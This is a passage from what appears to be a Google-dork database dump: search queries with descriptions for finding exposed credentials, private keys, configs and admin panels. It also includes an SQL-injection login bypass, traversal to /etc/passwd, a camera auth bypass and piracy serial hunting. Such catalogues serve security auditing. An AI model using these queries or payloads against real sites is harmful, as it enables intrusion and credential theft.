MRTG traffic analysis pages. This page lists information about machines on the network including CPU load, traffic statistics, etc. This information can be useful in mapping out a network.", "submited": "2004-05-03", "request": "intext:\"Tobias Oetiker\" \"traffic analysis\"", "id": 195}, {"short description": "inurl:tdbin", "long description": "This is the default directory for TestDirector (http://www.mercuryinteractive.com/products/testdirector/). This program contains sensitive information including software defect data which should not be publically accessible.", "submited": "2004-05-03", "request": "inurl:tdbin", "id": 196}, {"short description": "+intext:\"webalizer\" +intext:\"Total Usernames\" +intext:\"Usage Statistics for\"", "long description": "The webalizer program displays various information but this query displays usernames that have logged into the site. Attckers can use this information to mount an attack.", "submited": "2004-05-03", "request": "+intext:\"webalizer\" +intext:\"Total Usernames\" +intext:\"Usage Statistics for\"", "id": 197}, {"short description": "inurl:perform filetype:ini", "long description": "Displays the perform.ini file used by the popular irc client mIRC. Often times has channel passwords and/or login passwords for nickserv.", "submited": "2004-05-03", "request": "inurl:perform filetype:ini", "id": 198}, {"short description": "intitle:\"index of\" intext:globals.inc", "long description": "contains plaintext user/pass for mysql database", "submited": "2004-05-03", "request": "intitle:\"index of\" intext:globals.inc", "id": 199}, {"short description": "filetype:pdf \"Assessment Report\" nessus", "long description": "These are reports from the Nessus Vulnerability Scanner. These report contain detailed information about the vulnerabilities of hosts on a network, a veritable roadmap for attackers to folow.", "submited": "2004-05-03", "request": "filetype:pdf \"Assessment Report\" nessus", "id": 200}, {"short description": "inurl:\"smb.conf\" intext:\"workgroup\" filetype:conf conf", "long description": "These are samba configuration files. They include information about the network, trust relationships, user accounts and much more. Attackers can use this information to recon a network.", "submited": "2004-05-04", "request": "inurl:\"smb.conf\" intext:\"workgroup\" filetype:conf", "id": 201}, {"short description": "intitle:\"Samba Web Administration Tool\" intext:\"Help Workgroup\"", "long description": "This search reveals wide-open samba web adminitration servers. Attackers can change options on the server.", "submited": "2004-05-04", "request": "intitle:\"Samba Web Administration Tool\" intext:\"Help Workgroup\"", "id": 202}, {"short description": "filetype:properties inurl:db intext:password", "long description": "The db.properties file contains usernames, decrypted passwords and even hostnames and ip addresses of database servers. This is VERY severe, earning the highest danger rating.", "submited": "2004-05-04", "request": "filetype:properties inurl:db intext:password", "id": 203}, {"short description": "inurl:names.nsf?opendatabase", "long description": "A Login portal for Lotus Domino servers. Attackers can attack this page or use it to gather information about the server.", "submited": "2004-05-04", "request": "inurl:names.nsf?opendatabase", "id": 204}, {"short description": "\"index of\" inurl:recycler", "long description": "This is the default name of the Windows recycle bin. The files in this directory may contain sensitive information. Attackers can also crawl the directory structure of the site to find more information. In addition, the SID of a user is revealed also. An attacker could use this in a variety of ways.", "submited": "2004-05-04", "request": "\"index of\" inurl:recycler", "id": 205}, {"short description": "filetype:conf inurl:firewall -intitle:cvs", "long description": "These are firewall configuration files. Although these are often examples or sample files, in many cases they can still be used for information gathering purposes.", "submited": "2004-05-05", "request": "filetype:conf inurl:firewall -intitle:cvs", "id": 206}, {"short description": "filetype:inc intext:mysql_connect", "long description": "INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases.  Very dangerous stuff.  The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database.", "submited": "2004-05-05", "request": "filetype:inc intext:mysql_connect", "id": 207}, {"short description": "\"HTTP_FROM=googlebot\"  googlebot.com \"Server_Software=\"", "long description": "These pages contain trace information that was collected when the googlebot crawled a page. The information can include many different things such as path names, header information, server software versions and much more. Attackers can use information like this to formulate an attack against a site.", "submited": "2004-05-06", "request": "\"HTTP_FROM=googlebot\"  googlebot.com \"Server_Software=\"", "id": 208}, {"short description": "\"Request Details\" \"Control Tree\" \"Server Variables\"", "long description": "These pages contain a great deal of information including path names, session ID's, stack traces, port numbers, ip addresses, and much much more. Attackers can use this information to formulate a very advanced attack against these targets.", "submited": "2004-05-06", "request": "\"Request Details\" \"Control Tree\" \"Server Variables\"", "id": 209}, {"short description": "filetype:reg reg +intext:\"defaultusername\" +intext:\"defaultpassword\"", "long description": "These pages display windows registry keys which reveal passwords and/or usernames.", "submited": "2004-05-07", "request": "filetype:reg reg +intext:\"defaultusername\" +intext:\"defaultpassword\"", "id": 210}, {"short description": "inurl:metaframexp/default/login.asp | intitle:\"Metaframe XP Login\"", "long description": "These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site.", "submited": "2004-05-10", "request": "inurl:metaframexp/default/login.asp | intitle:\"Metaframe XP Login\"", "id": 211}, {"short description": "inurl:/Citrix/Nfuse17/", "long description": "These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site.", "submited": "2004-05-10", "request": "inurl:/Citrix/Nfuse17/", "id": 212}, {"short description": "filetype:wab wab", "long description": "These are Microsoft Outlook Mail address books. The information contained will vary, but at the least an attacker can glean email addresses and contact information.", "submited": "2004-05-10", "request": "filetype:wab wab", "id": 213}, {"short description": "filetype:reg reg HKEY_CURRENT_USER username", "long description": "This search finds registry files from the Windows Operating system. Considered the \"soul\" of the system, these files, and snippets from these files contain sensitive information, in this case usernames and/or passwords.", "submited": "2004-05-11", "request": "filetype:reg reg HKEY_CURRENT_USER username", "id": 214}, {"short description": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "long description": "This search reveals SSH host key fro the Windows Registry. These files contain information about where the user connects including hostnames and port numbers, and shows sensitive information such as the SSH host key in use by that client.", "submited": "2004-05-11", "request": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "id": 215}, {"short description": "inurl:/tmp", "long description": "Many times, this search will reveal temporary files and directories on the web server. The information included in these files and directories will vary, but an attacker could use this information in an information gathering campaign.", "submited": "2004-05-11", "request": "inurl:/tmp", "id": 216}, {"short description": "filetype:mbx mbx intext:Subject", "long description": "These searches reveal Outlook v 1-4 or Eudora mailbox files. Often these are made public on purpose, sometimes they are not. Either way, addresses and email text can be pulled from these files.", "submited": "2004-05-11", "request": "filetype:mbx mbx intext:Subject", "id": 217}, {"short description": "intitle:\"eMule *\" intitle:\"- Web Control Panel\" intext:\"Web Control Panel\" \"Enter your password here.\"", "long description": "This iks the login page for eMule, the p2p file-sharing program. These pages forego the login name, prompting only for a password. Attackers can use this to profile a target, gather information and ultimately upload or download files from the target (which is a function of the emule program itself)", "submited": "2004-05-11", "request": "intitle:\"eMule *\" intitle:\"- Web Control Panel\" intext:\"Web Control Panel\" \"Enter your password here.\"", "id": 218}, {"short description": "inurl:\"webadmin\" filetype:nsf", "long description": "This is a standard login page for Domino Web Administration.", "submited": "2004-05-11", "request": "inurl:\"webadmin\" filetype:nsf", "id": 219}, {"short description": "filetype:reg reg +intext:\"internet account manager\"", "long description": "This google search reveals users names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases.", "submited": "2004-05-12", "request": "filetype:reg reg +intext:\"internet account manager\"", "id": 220}, {"short description": "filetype:eml eml +intext:\"Subject\" +intext:\"From\" +intext:\"To\"", "long description": "These are oulook express email files which contain emails, with full  headers. The information in these emails can be useful for information gathering about a target.", "submited": "2004-05-12", "request": "filetype:eml eml +intext:\"Subject\" +intext:\"From\"", "id": 221}, {"short description": "inurl:vtund.conf intext:pass -cvs", "long description": "Theses are vtund configuration files (http://vtun.sourceforge.net). Vtund is an encrypted tunneling program. The conf file holds plaintext passwords. Many sites use the default password, but some do not. Regardless, attackers can use this information to gather information about a site.", "submited": "2004-05-12", "request": "inurl:vtund.conf intext:pass -cvs", "id": 222}, {"short description": "inurl:login filetype:swf swf", "long description": "This search reveals sites which may be using Shockwave (Flash) as a login mechanism for a site. The usernames and passwords for this type of login mechanism are often stored in plaintext inside the source of the .swl file.", "submited": "2004-05-12", "request": "inurl:login filetype:swf swf", "id": 223}, {"short description": "filetype:url +inurl:\"ftp://\"  +inurl:\"@\"", "long description": "These are FTP Bookmarks, some of which contain plaintext login names and passwords.", "submited": "2004-05-12", "request": "filetype:url +inurl:\"ftp://\"  +inurl:\"@\"", "id": 224}, {"short description": "intitle:guestbook \"advanced guestbook 2.2 powered\"", "long description": "Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. AttackerFrom there, hit \"Admin\" then do the following:Leave username field blank.For password, enter this exactly:') OR ('a' = 'aYou are now in the Guestbook's Admin section.http://www.securityfocus.com/bid/10209", "submited": "2004-05-12", "request": "intitle:guestbook  \"advanced guestbook 2.2 powered\"", "id": 225}, {"short description": "intitle:\"300 multiple choices\"", "long description": "This search shows sites that have the 300 error code, but also reveal a server tag at the bottom of the page that an attacker could use to profile a system.", "submited": "2004-05-13", "request": "intitle:\"300 multiple choices\"", "id": 226}, {"short description": "intitle:\"index of\" mysql.conf OR mysql_config", "long description": "This file contains port number, version number and path info to MySQL server.", "submited": "2004-05-13", "request": "intitle:\"index of\" mysql.conf OR mysql_config", "id": 227}, {"short description": "filetype:lic lic intext:key", "long description": "License files for various software titles that may contain contact info and the product version, license, and registration in a .LIC file.", "submited": "2004-05-13", "request": "filetype:lic lic intext:key", "id": 228}, {"short description": "\"please log in\"", "long description": "This is a simple search for a login page. Attackers view login pages as the \"front door\" to a site, but the information about where this page is stored and how it is presented can provide clues about breaking into a site.", "submited": "2004-05-13", "request": "\"please log in\"", "id": 229}, {"short description": "filetype:log username putty", "long description": "These log files record info about the SSH client PUTTY. These files contain usernames, site names, IP addresses, ports and various other information about the SSH server connected to.", "submited": "2004-05-13", "request": "filetype:log username putty", "id": 230}, {"short description": "filetype:log inurl:\"password.log\"", "long description": "These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user.", "submited": "2004-05-13", "request": "filetype:log inurl:\"password.log\"", "id": 231}, {"short description": "intitle:\"Dell Remote Access Controller\"", "long description": "This is the Dell Remote Access Controller that allows remote administration of a Dell server.", "submited": "2004-05-17", "request": "intitle:\"Dell Remote Access Controller\"", "id": 232}, {"short description": "filetype:vsd vsd network -samples -examples", "long description": "Reveals network maps (or any other kind you seek) that can provide sensitive information such as internal IPs, protocols, layout, firewall locations and types, etc. Attackers can use these files in an information gathering campaign.", "submited": "2004-05-13", "request": "filetype:vsd vsd network -samples -examples", "id": 233}, {"short description": "intitle:intranet inurl:intranet +intext:\"human resources\"", "long description": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\"This search allows you to not only access a companies private network, but also provides employee listings and other sensitive information that can be incredibly useful for any social engineering endeavour", "submited": "2004-05-13", "request": "intitle:intranet inurl:intranet +intext:\"human resources\"", "id": 234}, {"short description": "filetype:log cron.log", "long description": "Displays logs from cron, the *nix automation daemon.  Can be used to determine backups, full and realtive paths, usernames, IP addresses and port numbers of trusted network hosts, or just about anything the admin of the box decides to automate.  An attacker could use this information to possibly determine what extra vulnerable services are running on the machine, to find the location of backups, and, if the sysadmin uses cron to backup their logfiles, this cron log will give that away too.", "submited": "2004-05-14", "request": "filetype:log cron.log", "id": 235}, {"short description": "filetype:log access.log -CVS", "long description": "These are http server access logs which contain all sorts of information ranging from usernames and passwords to trusted machines on the network to full paths on the server.  Could be VERY useful in scoping out a potential target.", "submited": "2004-05-14", "request": "filetype:log access.log -CVS", "id": 236}, {"short description": "filetype:blt blt +intext:screenname", "long description": "Reveals AIM buddy lists, including screenname and who's on their 'buddy' list and their 'blocked' list.", "submited": "2004-05-14", "request": "filetype:blt blt +intext:screenname", "id": 237}, {"short description": "filetype:dat \"password.dat\"", "long description": "This file contains plaintext usernames and password. Deadly information in the hands of an attacker.", "submited": "2004-05-17", "request": "filetype:dat \"password.dat\"", "id": 238}, {"short description": "intitle:intranet inurl:intranet +intext:\"phone\"", "long description": "These pages are often private intranet pages which contain phone listings and email addresses. These pages can be used as a sort of online \"dumpster dive\".", "submited": "2004-05-17", "request": "intitle:intranet inurl:intranet +intext:\"phone\"", "id": 239}, {"short description": "filetype:conf slapd.conf", "long description": "slapd.conf is the file that contains all the configuration for OpenLDAP, including the root password, all in clear text. Other useful information that can be gleaned from this file includes full paths of other related installed applications, the r/w/e permissions for various files, and a bunch of other stuff.", "submited": "2004-05-17", "request": "filetype:conf slapd.conf", "id": 240}, {"short description": "inurl:php.ini filetype:ini", "long description": "The php.ini file contains all the configuration for how PHP is parsed on a server.  It can contain default database usernames, passwords, hostnames, IP addresses, ports, initialization of global variables and other information.  Since it is found by default in /etc, you might be able to find a lot more unrelated information in the same directory.", "submited": "2004-05-17", "request": "inurl:php.ini filetype:ini", "id": 241}, {"short description": "inurl:domcfg.nsf", "long description": "This will return a listing of servers running Lotus Domino.  These servers by default have very descriptive error messages which can be used to obtain path and OS information.  In addition, adding \"Login Form Mapping\" to the search will allow you to see detailed information about a few of the servers that have this option enabled.", "submited": "2004-05-17", "request": "inurl:domcfg.nsf", "id": 242}, {"short description": "filetype:pem intext:private", "long description": "This search will find private key files... Private key files are supposed to be, well... private.", "submited": "2004-05-17", "request": "filetype:pem intext:private", "id": 243}, {"short description": "\"Mecury Version\" \"Infastructure Group\"", "long description": "Mecury is a centralized ground control program for research satellites.  This query simply locates servers running this software.  As it seems to run primarily on PHP and MySQL, there are many possible vulnerabilities associated with it.", "submited": "2004-05-18", "request": "\"Mecury Version\" \"Infastructure Group\"", "id": 244}, {"short description": "filetype:conf inurl:proftpd.conf -sample", "long description": "A standard FTP configuration file that provides far too many details about how the server is setup, including installation paths,  location of logfiles, generic username and associated group, etc", "submited": "2004-05-20", "request": "filetype:conf inurl:proftpd.conf -sample", "id": 245}, {"short description": "+htpasswd +WS_FTP.LOG filetype:log", "long description": "WS_FTP.LOG can be used in many ways to find more information about a server. This query is very flexible, just substitute \"+htpasswd\" for \"+FILENAME\" and you may get several hits that you hadn't seen with the 'normal' search. Filenames suggested by the forum to explore are: phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet . The list goes on and on..A different approach might be \"allinurl: \"some.host.com\" WS_FTP.LOG filetype:log\" which tells you more about who's uploading files to a specific site.", "submited": "2004-05-20", "request": "+htpasswd +WS_FTP.LOG filetype:log", "id": 246}, {"short description": "\"error found handling the request\" cocoon filetype:xml", "long description": "Cocoon is an XML publishing framework. It allows you to define XML documents and transformations to be applied on it, to eventually generate a presentation format of your choice (HTML, PDF, SVG). For more information read http://cocoon.apache.org/2.1/overview.htmlThis Cocoon error displays library functions, cocoon version number, and full and/or relative path names.", "submited": "2004-07-29", "request": "\"error found handling the request\" cocoon filetype:xml", "id": 247}, {"short description": "intitle:\"Big Sister\" +\"OK Attention Trouble\"", "long description": "This search reveals Internal network status information about services and hosts.", "submited": "2004-05-24", "request": "intitle:\"Big Sister\" +\"OK Attention Trouble\"", "id": 248}, {"short description": "inurl:\"/cricket/grapher.cgi\"", "long description": "This search reveals information about internal networks, such as configuration, services, bandwidth.", "submited": "2004-05-24", "request": "inurl:\"/cricket/grapher.cgi\"", "id": 249}, {"short description": "inurl:\"cacti\" +inurl:\"graph_view.php\" +\"Settings Tree View\" -cvs -RPM", "long description": "This search reveals internal network info including architecture, hosts and services available.", "submited": "2004-05-24", "request": "inurl:\"cacti\" +inurl:\"graph_view.php\" +\"Settings Tree View\" -cvs -RPM", "id": 250}, {"short description": "intitle:\"System Statistics\" +\"System and Network Information Center\"", "long description": "This search reveals internal network information including network configuratino, ping times, services,  and host info.", "submited": "2004-05-24", "request": "intitle:\"System Statistics\" +\"System and Network Information Center\"", "id": 251}, {"short description": "inurl:\"wvdial.conf\" intext:\"password\"", "long description": "The wvdial.conf is used for dialup connections.it contains phone numbers, usernames and passwords in cleartext.", "submited": "2004-05-24", "request": "inurl:\"wvdial.conf\" intext:\"password\"", "id": 252}, {"short description": "filetype:inc dbconn", "long description": "This file contains the username and password the website uses to connect to the db.  Lots of these Google results don't take you straight to 'dbconn.inc', instead they show you an error message -- that shows you exactly where to find dbconn.inc!!", "submited": "2004-05-26", "request": "filetype:inc dbconn", "id": 253}, {"short description": "inurl:\"slapd.conf\" intext:\"credentials\" -manpage -\"Manual Page\" -man: -sample", "long description": "slapd.conf is the configuration file for slapd, the opensource LDAP deamon. The key \"credentinals\" contains passwords in cleartext.", "submited": "2004-05-25", "request": "inurl:\"slapd.conf\" intext:\"credentials\" -manpage -\"Manual Page\" -man: -sample", "id": 254}, {"short description": "inurl:\"slapd.conf\" intext:\"rootpw\"  -manpage -\"Manual Page\" -man: -sample", "long description": "slapd.conf is the configuration file for slapd, the opensource LDAP deamon. You can view a cleartext or crypted password for the \"rootdn\".", "submited": "2004-05-25", "request": "inurl:\"slapd.conf\" intext:\"rootpw\"  -manpage -\"Manual Page\" -man: -sample", "id": 255}, {"short description": "filetype:ini ws_ftp pwd", "long description": "The encryption method used in WS_FTP is _extremely_ weak. These files can be found with the \"index of\" keyword or by searching directly for the PWD= value inside the configuration file.", "submited": "2004-05-26", "request": "filetype:ini ws_ftp pwd", "id": 256}, {"short description": "inurl:forward filetype:forward -cvs", "long description": "Users on *nix boxes can forward their mail by placing a .forward file in their home directory. These files reveal email addresses.", "submited": "2004-05-26", "request": "inurl:forward filetype:forward -cvs", "id": 257}, {"short description": "\"Invision Power Board Database Error\"", "long description": "These are SQL error messages, ranging from to many connections, access denied to user xxx, showing full path info to the php files etc.. There is an exploitable bug in version 1.1 of this software and the current version is 1.3 available for download on the site.", "submited": "2004-05-28", "request": "\"Invision Power Board Database Error\"", "id": 258}, {"short description": "filetype:netrc password", "long description": "The .netrc file is used for automatic login to servers. The passwords are stored in cleartext.", "submited": "2004-05-26", "request": "filetype:netrc password", "id": 259}, {"short description": "signin filetype:url", "long description": "Javascript for user validation  is a bad idea as it shows cleartext user/pass combos. There is one googledork who forgot that.", "submited": "2004-05-26", "request": "signin filetype:url", "id": 260}, {"short description": "filetype:dat wand.dat", "long description": "The world-famous web-browser Opera has the ability to save the password for you, and it call the system \"Magic Wand\". When on a site, you can save the username and password to the magic wand, then on the site again, click the magic wand icon and it will fill it out automaticly for you. What a joy! Opera saves this file on you'r computer, it is located (on winXP) here: D:\\Documents and Settings\\Peefy\\Programdata\\Opera\\Opera75\\profile\\wand.dat for me offcourse, change it so its suitable for you..But, if you don't have a descrambler or whatever, the passwords arent cleartext, but you have to put the wand file in the location specified above, then open opera, click tools, Wand Passwords, then see the URL's saved, then go to theese URL's and click the wand button.", "submited": "2004-05-27", "request": "filetype:dat wand.dat", "id": 261}, {"short description": "\"Index Of /network\" \"last modified\"", "long description": "Many of these directories contain information about the network, though an attacker would need  a considerable amount of patience to find it.", "submited": "2004-06-01", "request": "\"Index Of /network\" \"last modified\"", "id": 262}, {"short description": "inurl:/eprise/", "long description": "silkRoad Eprise is a dynamic content management product that simplifies the flow of content to a corporate website. The software requires  NT 4, Windows 2000 or Solaris and is used by high-profile corporations. If an attacker cuts the url after the eprise/ directory, he is presented with the admin logon screen.", "submited": "2004-05-26", "request": "inurl:/eprise/", "id": 263}, {"short description": "intitle:\"album permissions\" \"Users who can modify photos\" \"EVERYBODY\"", "long description": "Gallery (http://gallery.menalto.com) is software that allows users to create webalbums and upload pictures to it. In some installations Gallery lets you access the Admin permission page album_permissions.php without authentication. Even if not \"everybody\" has modify rights, an attacker can do a search for \"users who can see the album\" to retrieve valid usernames for the gallery.", "submited": "2004-06-02", "request": "intitle:\"album permissions\" \"Users who can modify photos\" \"EVERYBODY\"", "id": 264}, {"short description": "filetype:cfg mrtg \"target[*]\" -sample -cvs -example", "long description": "Mrtg.cfg is the configuration file for polling SNMP enabled devices. The community string (often 'public') is found in the line starting with target:#Target[test]: 1.3.6.1.4.1.2021.10.1.5.1&amp;1.3.6.1.4.1.2021.10.1.5.2:public@localhostRemember not all targets are SNMP devices. Users can monitor CPU info for example.", "submited": "2004-06-02", "request": "filetype:cfg mrtg \"target[*]\" -sample -cvs -example", "id": 265}, {"short description": "filetype:ldb admin", "long description": "According to filext.com, the ldb file is \"A lock file is used to keep muti-user databases from being changed in the same place by two people at the same time resulting in data corruption.\" These Access lock files contain the username of the last user and they ALWAYS have the same filename and location as the database. Attackers can substitute mdb for ldb and dowload the database file.", "submited": "2004-06-02", "request": "filetype:ldb admin", "id": 266}, {"short description": "inurl:search/admin.php", "long description": "phpMySearch is a personal search engine that one can use to provide a search feature for one's own Web site. With this search an attacker can find admin logon screens. This software does not seem to be very popular yet, but would allow attackers to access indexed information about the host if compromised.", "submited": "2004-05-30", "request": "inurl:search/admin.php", "id": 267}, {"short description": "filetype:r2w r2w", "long description": "WRQ Reflection gives you a standard desktop that includes web- and Windows-based terminal emulation and X Windows products. Terminal emulation settings are saved to a configuration file, depending on the version called r1w, r2w, or r4w. If an attacker loads these files he can access the main login screen on mainframe systems for example.", "submited": "2004-06-04", "request": "filetype:r2w r2w", "id": 268}, {"short description": "filetype:php inurl:vAuthenticate", "long description": "vAuthenticate is a multi-platform compatible PHP and MySQL script which allows creation of new user accounts new user groups, activate/inactivate groups or individual accounts, set user level, etc. There are two admin users by default with an easy to guess password. The backup admin user can *not* be deleted. There is also a test account with the same password that can not be deleted.An attacker can find the default passwords by downloading the software and browsing the .sql files. Default passwords are seldom changed if the user is not *forced* to change them first before using the sofware. This software doesn't enforce such a rule.", "submited": "2004-06-04", "request": "filetype:php inurl:vAuthenticate", "id": 269}, {"short description": "intitle:\"ZyXEL Prestige Router\" \"Enter password\"", "long description": "This is the main authentication screen for the ZyXEL Prestige Router.", "submited": "2004-06-04", "request": "intitle:\"ZyXEL Prestige Router\" \"Enter password\"", "id": 270}, {"short description": "\"Welcome to the Prestige Web-Based Configurator\"", "long description": "This is the configuration screen for a Prestige router. This page indicates that the router has not yet been setup and any web user can make changes to the router.", "submited": "2004-06-04", "request": "\"Welcome to the Prestige Web-Based Configurator\"", "id": 271}, {"short description": "intitle:\"ADSL Configuration page\"", "long description": "This is the status screen for the Solwise ADSL modem. Information available from this page includes IP addresses, MAC addresses, subnet mask, firware version of the modem. Attackers can use this information to formulate an attack.", "submited": "2004-06-04", "request": "intitle:\"ADSL Configuration page\"", "id": 272}, {"short description": "\"Version Info\" \"Boot Version\" \"Internet Settings\"", "long description": "This is the status page for a Belkin Cable/DSL gateway. Information can be retrieved from this page including IP addresses, WAN addresses, MAC addresses, firmware versions, serial numbers, subnet masks, firewall settings, encryption settings, NAT settings and SSID. Attackers can use this information to formulate an attack.", "submited": "2004-06-04", "request": "\"Version Info\" \"Boot Version\" \"Internet Settings\"", "id": 273}, {"short description": "filetype:sql +\"IDENTIFIED BY\" -cvs", "long description": "Database maintenance is often automated by use of .sql files wich may contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.An attacker can use these files to acquire database permissions that normally would not be given to the masses.", "submited": "2004-06-04", "request": "filetype:sql +\"IDENTIFIED BY\" -cvs", "id": 274}, {"short description": "filetype:sql password", "long description": "Database maintenance is often automated by use of .sql files that contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.An attacker can use these files to acquire database permissions that normally would not be given to the masses.", "submited": "2004-06-04", "request": "filetype:sql password", "id": 275}, {"short description": "intitle:\"Welcome Site/User Administrator\" \"Please select the language\" -demos", "long description": "service providers worldwide use Ensim's products to automate the  management of their hosting services. Currently it hosts more than 500,000 Web sites and five million mailboxes.Ensim's uses a control panel GUI to manage the servers. It has four levels of priviledges. The software runs on TCP port 19638, but access is normally limited to trusted hosts only. A local exploit was found by badc0ded.org in virthostmail, part of Ensim WEBppliance Pro.", "submited": "2004-06-10", "request": "intitle:\"Welcome Site/User Administrator\" \"Please select the language\" -demos", "id": 276}, {"short description": "filetype:pwd service", "long description": "Microsoft Frontpage extensions appear on virtually every type of scanner. In the late 90's people thought they where hardcore by defacing sites with Frontpage. Today, there are still vulnerable servers found with Google. An attacker can simply take advantage from administrators who 'forget' to set up the policies for Frontpage extensions. An attacker can also search for 'filetype:pwd users'.", "submited": "2004-06-10", "request": "filetype:pwd service", "id": 277}, {"short description": "\"ttawlogin.cgi/?action=\"", "long description": "Tarantella is a family of enterprise-class secure remote access software products. This Google-dork lists the login page for remote access to either the site server or another server within the target company. Tarantella also has a few security issues for a list of possible things that a malicous user could try to do, have a look at - http://www.tarantella.com/security/index.html An example of a malicous user could try is http://www.tarantella.com/security/bulletin-03.html the exploit isn't included in the User-Notice, but I've worked it out to be something like install directory/ttawebtop.cgi/?action=start&amp;pg=../../../../../../../../../../../../../../../etc/passwd", "submited": "2004-06-04", "request": "\"ttawlogin.cgi/?action=\"", "id": 278}, {"short description": "Axis Network Cameras", "long description": "The AXIS 2400 is a Web server of its own. This means that the server is secured like any other Internet host. It is up to the network manager to restrict access to the AXIS Web Cameras camera server. AXIS Network cams have a cam control page called indexFrame.shtml wich can easily be found by searching Google. An attacker can look for the ADMIN button and try the default passwords found in the documentation. An attacker may also find that the directories are browsable. Additional security related information was found on the Internet.Securityfocus(www.securityfocus.com):----------------------------------------------------\"It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.\" Core Security Technologies Advisory (http://www.coresecurity.com):---------------------------------------------------\"We have discovered the following security vulnerability: by accessing http://camera-ip//admin/admin.shtml (notice the double slash) the authentication for \"admin\" is bypassed and an attacker gains direct access to the configuration.", "submited": "2004-06-06", "request": "inurl:indexFrame.shtml Axis", "id": 279}, {"short description": "POWERED BY HIT JAMMER 1.0!", "long description": "Hit Jammer is a Unix compatible script that allows you to manage the content and traffic exchange and make web changes, all without needing HTML. It is typicaly used by the underground sites on the Net who \"pay for surfing ads\" and advertise spam services or software.An attacker can find these sites by searching for the typical \"powered by hit jammer !\" frase on the bottom of the main page. Then if he changes the URL to www.target.com/admin/admin.php he is taken to the admin panel. Hit Jammer administrators are warned to protect this page with the .htaccess logon procedure, but many fail to do just that. In such cases, customer information like email addresses and passwords are in clear view of the attacker. Since human beings often use one simple password for many things this is a very dangerous practice.", "submited": "2004-06-06", "request": "POWERED BY HIT JAMMER 1.0!", "id": 280}, {"short description": "94FBR \"ADOBE PHOTOSHOP\"", "long description": "94FBR is part of many serials. An malicious user would only have to change the programm name (photoshop in this example) in this search to find a perfectly valid serial.Other values to look for are: GC6J3. GTQ62. FP876. D3DX8.", "submited": "2004-06-10", "request": "94FBR \"ADOBE PHOTOSHOP\"", "id": 281}, {"short description": "inurl:zebra.conf intext:password -sample -test -tutorial -download", "long description": "GNU Zebra is free software that manages TCP/IP based routing protocols.  It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The zebra.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc.", "submited": "2004-06-10", "request": "inurl:zebra.conf intext:password -sample -test -tutorial -download", "id": 282}, {"short description": "inurl:ospfd.conf intext:password -sample -test -tutorial -download", "long description": "GNU Zebra is free software that manages TCP/IP based routing protocols. It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The ospfd.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc.", "submited": "2004-06-10", "request": "inurl:ospfd.conf intext:password -sample -test -tutorial -download", "id": 283}, {"short description": "intitle:\"Index of /\" modified php.exe", "long description": "PHP installed as a cgi-bin on a Windows Apache server will allow an attacker to view arbitrary files on the hard disk, for example by requesting \"/php/php.exe?c:\\boot.ini.\"", "submited": "2004-06-10", "request": "intitle:\"Index of /\" modified php.exe", "id": 284}, {"short description": "inurl:ccbill filetype:log", "long description": "CCBill.com sells E-tickets to online entertainment and subscription-based websites. CCBill.com gives consumers access to the hottest entertainment sites on the World Wide Web. The word \"hot\" in this context seems apropriate when considering the type of sites that use e-tickets :)CCBill log files contain usernames and password information, but are protected with DES encryption. An attacker can crack these using the information provided on this site: http://www.jaddo.net/forums/index.php?&amp;act=ST&amp;f=19&amp;t=4242.", "submited": "2004-06-18", "request": "inurl:ccbill filetype:log", "id": 285}, {"short description": "filetype:mdb inurl:users.mdb", "long description": "Everyone has this problem, we need to remember many passwords to access the resources we use. Some believe it is a good solution to use Microsoft Access as a password database..An attacker can find and download those mdb files easily with Google. This search tries to find such \"user\" databases. Some are password protected, many are not. Weee!", "submited": "2004-06-16", "request": "filetype:mdb inurl:users.mdb", "id": 286}, {"short description": "intitle:\"Error using Hypernews\" \"Server Software\"", "long description": "HyperNews is a cross between the WWW and Usenet News. Readers can browse through the messages written by other people and reply to those messages. This search reveals the server software, server os, server account user:group (unix), and the server administrator email address. Many of these messages also include a traceback of the files and linenumbers and a listing of the cgi ENV variables. An attacker can use this information to prepare an attack either on the platform or the script files.", "submited": "2004-06-15", "request": "intitle:\"Error using Hypernews\" \"Server Software\"", "id": 287}, {"short description": "filetype:cfg ks intext:rootpw -sample -test -howto", "long description": "Anaconda is a linux configuration tool like yast on suse linux. The root password is often encrypted - like md5 or read from the shadow. Sometimes an attacker can also get a cleartext password.There are more ks configs then you might expect and with a bit of searching through the result list an attacker can find the root password and own that system.", "submited": "2004-06-14", "request": "filetype:cfg ks intext:rootpw -sample -test  -howto", "id": 288}, {"short description": "filetype:php inurl:\"viewfile\" -\"index.php\" -\"idfil", "long description": "Programmers do strange things sometimes and forget about security. This search is the perfect example. These php scripts are written for viewing files in the web directory (e.g. ww.XXX.com/viewfile.php?my_howto.txt --&gt; will show you the my_howto.txt).An attacker can check for buggy php scripts wich allow you to view any file on the system (with webservers permissions). Try the good, old directory traversal trick: \"../../../\". You have to know the filename and location, but that's not a big problem (/etc/passwd anyone ?).", "submited": "2004-06-16", "request": "filetype:php inurl:\"viewfile\" -\"index.php\" -\"idfil", "id": 289}, {"short description": "allinurl:\".nsconfig\" -sample -howto -tutorial", "long description": "Access to a Web server's 